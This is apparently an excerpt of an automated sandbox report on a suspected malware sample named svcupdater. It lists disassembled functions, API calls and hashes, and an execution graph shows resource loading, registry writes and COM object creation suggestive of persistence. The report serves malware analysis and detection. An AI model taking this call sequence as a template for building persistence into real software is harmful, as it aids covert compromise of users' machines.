                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: ba1ba96533a569d7b4ebaaa8bfc1548dbeaf837970cc17fb0b3743e4fd896bbf
                                                                                                    • Instruction ID: e5262b4eae8c025bbcb199d4a0ddd6a1ccbc638385d1fc3ad39acd20a2754b0d
                                                                                                    • Opcode Fuzzy Hash: ba1ba96533a569d7b4ebaaa8bfc1548dbeaf837970cc17fb0b3743e4fd896bbf
                                                                                                    • Instruction Fuzzy Hash: B501D43221DA199EA72526B4BC86B7F6AC8EB417B437043AFF710874E1EF614C0B56C0
                                                                                                    Function 00BFFF73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,2F4C7F60,?,?,00000000,00C136F0,000000FF,?,00BFFF03,?,?,00BFFED7,00000016), ref: 00BFFFA8
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BFFFBA
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00C136F0,000000FF,?,00BFFF03,?,?,00BFFED7,00000016), ref: 00BFFFDC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 4ad5c3e42a01c3f7d46a730b64be756cf2b86cb3bb0fe19075054bc6be777594
                                                                                                    • Instruction ID: 0ad711e5bbc9db24b42d8d22e6124be1bdcc8031ca315deb9ebb9e8e4ba9a901
                                                                                                    • Opcode Fuzzy Hash: 4ad5c3e42a01c3f7d46a730b64be756cf2b86cb3bb0fe19075054bc6be777594
                                                                                                    • Instruction Fuzzy Hash: 0C018F71954A59FBCB128B50DC05BFEBBB8FB46B14F004565F911A2690DBB49904CA90
                                                                                                    Function 00BE3A20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00BE3ABF
                                                                                                      • Part of subcall function 00BF691B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00BF418F,?,00C23B78,00BE2904,string too long,00BE2904,?,?,?), ref: 00BF697B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                    • API String ID: 3109751735-1866435925
                                                                                                    • Opcode ID: a37828b35e3ec12ac6119cac8fb4aceb9739b39023d025439a7458affc26af5e
                                                                                                    • Instruction ID: 31e3d13711605115a1ff4c0daf507d19a7aa0749873f31a41f4cbdb922252919
                                                                                                    • Opcode Fuzzy Hash: a37828b35e3ec12ac6119cac8fb4aceb9739b39023d025439a7458affc26af5e
                                                                                                    • Instruction Fuzzy Hash: 431127B29003086BC710DF59D805BDAB3DCEF45710F1485BAF99487642F7B0AA84CB91
                                                                                                    Function 00BF98E2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00BF9893,00000000,?,00C267D4,?,?,?,00BF9A36,00000004,InitializeCriticalSectionEx,00C17190,InitializeCriticalSectionEx), ref: 00BF98EF
                                                                                                    • GetLastError.KERNEL32(?,00BF9893,00000000,?,00C267D4,?,?,?,00BF9A36,00000004,InitializeCriticalSectionEx,00C17190,InitializeCriticalSectionEx,00000000,?,00BF97ED), ref: 00BF98F9
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00BF9921
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                    • Opcode ID: 2344fd96baf64f00589b2dc134e94edc2049a14e5dfe1e83fd3bed6915780c1b
                                                                                                    • Instruction ID: d590c00b14ebb960411aac77afdf7b9606f8b60109351ed5f4c5c8c84d442479
                                                                                                    • Opcode Fuzzy Hash: 2344fd96baf64f00589b2dc134e94edc2049a14e5dfe1e83fd3bed6915780c1b
                                                                                                    • Instruction Fuzzy Hash: CDE04830680209F7DF111B71DD46BAC3B94EB42B50F25C0A0FE0CA44E0D7A1995495C4
                                                                                                    Function 00C02C18 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetConsoleOutputCP.KERNEL32(2F4C7F60,00000000,00000000,00000000), ref: 00C02C7B
                                                                                                      • Part of subcall function 00C09AE1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C08296,?,00000000,-00000008), ref: 00C09B8D
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C02ED6
                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C02F1E
                                                                                                    • GetLastError.KERNEL32 ref: 00C02FC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2112829910-0
                                                                                                    • Opcode ID: f64059974a6e227ba1fb4546b18fae3e6f6f9093a41f68f989f693b43129b2b7
                                                                                                    • Instruction ID: 580493ce7370ba65552b5d9e5713b3e3e04e6b7e169dd49989ca9340395f1c22
                                                                                                    • Opcode Fuzzy Hash: f64059974a6e227ba1fb4546b18fae3e6f6f9093a41f68f989f693b43129b2b7
                                                                                                    • Instruction Fuzzy Hash: 97D16BB5D002599FCF15CFE8D884AADBBB5FF48344F24452AE865E7391D730A942CB60
                                                                                                    Function 00BF88B3 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1740715915-0
                                                                                                    • Opcode ID: 17e687cef4eaa048e5b15d4f401982b18794f13edfac66cdec50d88c84a0d135
                                                                                                    • Instruction ID: b583b92487d4b4acc1262193e61a00740ec8628c1ecb47680445dcd794d05aa5
                                                                                                    • Opcode Fuzzy Hash: 17e687cef4eaa048e5b15d4f401982b18794f13edfac66cdec50d88c84a0d135
                                                                                                    • Instruction Fuzzy Hash: 0A51007260060EAFDB299F11D841B7A77E0EF10310F1090AEEF45972A1EBB1ED48CB91
                                                                                                    Function 00C09EFD Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00C09AE1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C08296,?,00000000,-00000008), ref: 00C09B8D
                                                                                                    • GetLastError.KERNEL32 ref: 00C09F61
                                                                                                    • __dosmaperr.LIBCMT ref: 00C09F68
                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00C09FA2
                                                                                                    • __dosmaperr.LIBCMT ref: 00C09FA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1913693674-0
                                                                                                    • Opcode ID: 15b75038a5fe9fbedc9ebc25d5ce344ad1dd64d266f886930d976ac9e43b8531
                                                                                                    • Instruction ID: 6345dd31c8fcd7661c60e82b6758242b42bd6845d4a960e1fc532c3d5f482aec
                                                                                                    • Opcode Fuzzy Hash: 15b75038a5fe9fbedc9ebc25d5ce344ad1dd64d266f886930d976ac9e43b8531
                                                                                                    • Instruction Fuzzy Hash: A221957160421AAFDB10BFE5CC80A7BB7A9FF453647108559F929D7292E730EE40DB90
                                                                                                    Function 00BFF07B Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 43496de0578851cb324a915dbd1d008d298fc5ab402cd439cb6ed902c185c550
                                                                                                    • Instruction ID: c202ee622097f7d321b022644d7f0720d63f61c0187ffa677dd33e1e5258c64b
                                                                                                    • Opcode Fuzzy Hash: 43496de0578851cb324a915dbd1d008d298fc5ab402cd439cb6ed902c185c550
                                                                                                    • Instruction Fuzzy Hash: 9821D13160021FEF9B20AF70CC8097AB7E9EF50364B1045B5FA25A7151EB31ED5987A0
                                                                                                    Function 00C0AE93 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00C0AE9B
                                                                                                      • Part of subcall function 00C09AE1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C08296,?,00000000,-00000008), ref: 00C09B8D
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C0AED3
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C0AEF3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 158306478-0
                                                                                                    • Opcode ID: 5807dc69d51c2089e0a5ccf6c6ae956f2f328f1e41c94ceb27dc85e5b3e69336
                                                                                                    • Instruction ID: 3cf10ffef8abf8d3a19dfd82023f38adb7d8e1816a514910e8bf1ae146419b94
                                                                                                    • Opcode Fuzzy Hash: 5807dc69d51c2089e0a5ccf6c6ae956f2f328f1e41c94ceb27dc85e5b3e69336
                                                                                                    • Instruction Fuzzy Hash: B611D6F6609716FEE71127F6AC89EAF7D6CEE8A3943100115F501D1181FA34DE02E6B2
                                                                                                    Function 00C11D47 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00C0E222,00000000,00000001,00000000,00000000,?,00C03015,00000000,00000000,00000000), ref: 00C11D5E
                                                                                                    • GetLastError.KERNEL32(?,00C0E222,00000000,00000001,00000000,00000000,?,00C03015,00000000,00000000,00000000,00000000,00000000,?,00C035D3,00000000), ref: 00C11D6A
                                                                                                      • Part of subcall function 00C11D30: CloseHandle.KERNEL32(FFFFFFFE,00C11D7A,?,00C0E222,00000000,00000001,00000000,00000000,?,00C03015,00000000,00000000,00000000,00000000,00000000), ref: 00C11D40
                                                                                                    • ___initconout.LIBCMT ref: 00C11D7A
                                                                                                      • Part of subcall function 00C11CF2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C11D21,00C0E20F,00000000,?,00C03015,00000000,00000000,00000000,00000000), ref: 00C11D05
                                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00C0E222,00000000,00000001,00000000,00000000,?,00C03015,00000000,00000000,00000000,00000000), ref: 00C11D8F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                    • String ID:
                                                                                                    • API String ID: 2744216297-0
                                                                                                    • Opcode ID: 8d8b17843e1e956c5af39366a158535e94591efc44c86d6bb75151458e5c86d1
                                                                                                    • Instruction ID: b68b093c1ec86a69207bff1890e7a1daed5cab494492fa8dbb5877c0e2c930b2
                                                                                                    • Opcode Fuzzy Hash: 8d8b17843e1e956c5af39366a158535e94591efc44c86d6bb75151458e5c86d1
                                                                                                    • Instruction Fuzzy Hash: 44F0F836010569FBCF222FD1AC05BEE3F26FF4A3A0B058010FE1985520CA3289A0AB90
                                                                                                    Function 00BFED7D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00BFEE0D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                    • Opcode ID: 45b8dee22d68e22c01ada62e5cc56735e1e055fdc5cc65187fb462b43817cf2b
                                                                                                    • Instruction ID: 336d09e0d9c61a2efbbc162f58099ee74920631b07c5a0972bb791fbbb6e4247
                                                                                                    • Opcode Fuzzy Hash: 45b8dee22d68e22c01ada62e5cc56735e1e055fdc5cc65187fb462b43817cf2b
                                                                                                    • Instruction Fuzzy Hash: C8517C61E0910986DB127B14DD513BE7BD4EB40700F2489A8F1B6432FAEB34CD99DA46
                                                                                                    Function 00BE3930 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00BE3ABF
                                                                                                      • Part of subcall function 00BF691B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00BF418F,?,00C23B78,00BE2904,string too long,00BE2904,?,?,?), ref: 00BF697B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                    • API String ID: 3109751735-1240500531
                                                                                                    • Opcode ID: 96e04039c1126bb58793bef73449c5fe671eddd6a119534d0fcba0007c481736
                                                                                                    • Instruction ID: 6c0eaf4f53046052a08a3446f80f6dd10daee2c5cb744cdbcab059c88ae7dd07
                                                                                                    • Opcode Fuzzy Hash: 96e04039c1126bb58793bef73449c5fe671eddd6a119534d0fcba0007c481736
                                                                                                    • Instruction Fuzzy Hash: A75149B1910248ABCB04CF59CC45BAEF7F8EF45710F1482AEF95497781E770AA44CBA0
                                                                                                    Function 00BF8EAF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 00BF8ED4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EncodePointer
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                    • Opcode ID: bc18c26ba3bc47b91592955da364c273b4bbfe180e2dada28ac3098f31d3f511
                                                                                                    • Instruction ID: bd59f86cf4483768e9021cc90d9297cc9bdd1b03a03d03118413354154292281
                                                                                                    • Opcode Fuzzy Hash: bc18c26ba3bc47b91592955da364c273b4bbfe180e2dada28ac3098f31d3f511
                                                                                                    • Instruction Fuzzy Hash: FE413A7290020DAFCF16DF94CC81AAE7BF6FF48304F148599FA0467211D7359A54DB91

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:78.9%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:29.5%
                                                                                                    Total number of Nodes:105
                                                                                                    Total number of Limit Nodes:7
                                                                                                    execution_graph 194 7ff790dc1938 197 7ff790dc194c FindResourceExA 194->197 198 7ff790dc1941 ExitProcess 197->198 199 7ff790dc1976 SizeofResource 197->199 199->198 200 7ff790dc198b LoadResource 199->200 200->198 201 7ff790dc199f LockResource RegOpenKeyExW 200->201 201->198 202 7ff790dc19da RegSetValueExW 201->202 202->198 203 7ff790dc1a04 RegOpenKeyExW 202->203 203->198 204 7ff790dc1a33 RegSetValueExW 203->204 204->198 205 7ff790dc1a59 204->205 221 7ff790dc1adc GetProcessHeap HeapAlloc StrCpyW 205->221 208 7ff790dc1adc 40 API calls 209 7ff790dc1a6d 208->209 258 7ff790dc17a4 SysAllocString SysAllocString CoInitializeEx 209->258 211 7ff790dc1a7c 266 7ff790dc1154 7 API calls 211->266 213 7ff790dc1a92 214 7ff790dc1aa2 213->214 276 7ff790dc15cc SysAllocString SysAllocString CoInitializeEx 213->276 215 7ff790dc17a4 9 API calls 214->215 217 7ff790dc1ab1 215->217 218 7ff790dc1154 20 API calls 217->218 219 7ff790dc1ac3 218->219 219->198 220 7ff790dc15cc 10 API calls 219->220 220->198 222 7ff790dc1b32 221->222 222->222 223 7ff790dc1b56 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 222->223 224 7ff790dc1bf0 StrCatW StrCatW 223->224 225 7ff790dc1bb5 StrCatW 223->225 286 7ff790dc1d04 lstrlenW 224->286 226 7ff790dc1bd3 225->226 227 7ff790dc1bda StrCatW StrCatW 225->227 226->227 227->224 230 7ff790dc1d04 5 API calls 231 7ff790dc1c2e 230->231 232 7ff790dc1d04 5 API calls 231->232 233 7ff790dc1c3d 232->233 234 7ff790dc1d04 5 API calls 233->234 235 7ff790dc1c4c 234->235 236 7ff790dc1d04 5 API calls 235->236 237 7ff790dc1c5b 236->237 238 7ff790dc1d04 5 API calls 237->238 239 7ff790dc1c6a 238->239 240 7ff790dc1d04 5 API calls 239->240 241 7ff790dc1c79 240->241 242 7ff790dc1d04 5 API calls 241->242 243 7ff790dc1c88 242->243 244 7ff790dc1d04 5 API calls 243->244 245 7ff790dc1c97 244->245 246 7ff790dc1d04 5 API calls 245->246 247 7ff790dc1ca6 246->247 248 7ff790dc1d04 5 API calls 247->248 249 7ff790dc1cb5 248->249 250 7ff790dc1d04 5 API calls 249->250 251 7ff790dc1cc4 250->251 252 7ff790dc1d04 5 API calls 251->252 253 7ff790dc1cd3 252->253 254 7ff790dc1d04 5 API calls 253->254 255 7ff790dc1ce2 254->255 291 7ff790dc1db8 GetProcessHeap HeapAlloc 255->291 259 7ff790dc190a SysFreeString SysFreeString 258->259 260 7ff790dc17eb CoInitializeSecurity 258->260 259->211 261 7ff790dc1833 CoCreateInstance 260->261 262 7ff790dc1827 260->262 263 7ff790dc1904 CoUninitialize 261->263 264 7ff790dc1867 VariantInit 261->264 262->261 262->263 263->259 265 7ff790dc18bd 264->265 265->263 267 7ff790dc1571 6 API calls 266->267 268 7ff790dc11e7 CoInitializeSecurity 266->268 267->213 269 7ff790dc122f CoCreateInstance 268->269 270 7ff790dc1223 268->270 271 7ff790dc156b CoUninitialize 269->271 272 7ff790dc1260 VariantInit 269->272 270->269 270->271 271->267 274 7ff790dc12b7 272->274 273 7ff790dc14eb 273->271 274->273 275 7ff790dc143d VariantInit VariantInit VariantInit 274->275 275->273 277 7ff790dc177d SysFreeString SysFreeString 276->277 278 7ff790dc160d CoInitializeSecurity 276->278 277->214 279 7ff790dc1655 CoCreateInstance 278->279 280 7ff790dc1649 278->280 281 7ff790dc1777 CoUninitialize 279->281 282 7ff790dc1684 VariantInit 279->282 280->279 280->281 281->277 283 7ff790dc16da 282->283 284 7ff790dc1714 VariantInit 283->284 285 7ff790dc1746 283->285 284->285 285->281 307 7ff790dc1078 286->307 288 7ff790dc1c1f 288->230 289 7ff790dc1d92 StrStrIW 289->288 290 7ff790dc1d33 289->290 290->288 290->289 292 7ff790dc1df5 291->292 292->292 293 7ff790dc1e0d GetProcessHeap HeapAlloc 292->293 294 7ff790dc1000 3 API calls 293->294 295 7ff790dc1e37 294->295 296 7ff790dc1e3f StrStrIW 295->296 297 7ff790dc1a60 295->297 298 7ff790dc2040 7 API calls 296->298 299 7ff790dc1e5e StrStrIW StrNCatW StrCatW 296->299 297->208 298->297 300 7ff790dc2002 StrCatW StrStrIW 299->300 303 7ff790dc1eb8 299->303 300->299 301 7ff790dc203c 300->301 301->298 302 7ff790dc1fa1 StrCatW StrNCatW 306 7ff790dc1fcd StrCatW 302->306 